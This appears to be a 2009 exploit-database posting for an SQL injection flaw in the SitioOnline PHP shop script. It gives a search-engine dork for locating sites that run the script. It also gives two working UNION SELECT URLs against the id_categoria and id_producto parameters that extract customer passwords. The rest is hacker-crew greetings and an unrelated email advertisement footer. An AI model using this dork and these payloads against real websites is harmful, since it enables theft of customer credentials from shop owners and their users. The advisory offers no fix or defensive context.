SitioOnline SQL Injection Vulnerability :

Date : 2009-12-15 Author : 4lG3r14n0-t3r0
  **********************- cvs -vrew ***********************

[!]            SitioOnline SQL Injection Vulnerability
[!] Author    : 4lG3r14n0-t3r0
[!] MAIL      : [email protected]

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.SitioOnline.cl
[+] script   : SitioOnline
[+] Download :
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"lista_articulos.php?id_categoria="
    or Powered by SitioOnline.com


**************************************************************************/
[ Vulnerable File ]

http://server/lista_articulos.php?id_categoria=

http://server/detalle_articulo.php?id_producto=

[ Exploit ]

[1]

http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--


[2]


http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--

[  Greets ]

[+] :cvs crew : ange78 , saf1-casanova,jess-injection,ijection-master,dark-master , alqaiser, u$er-maskine  , ALL HACKERS MUSLIMS

& all members of : tryag.cc , hackteach.org

made in algeria

N'est pas mort ce qui à jamais dort
________________________________
PC, téléphones portables, souris hi-tech. à gagner grâce à Hotmail ! C'est ici !<http://www.hotmailmagicmoment.com>

C1

 

C2

 

C3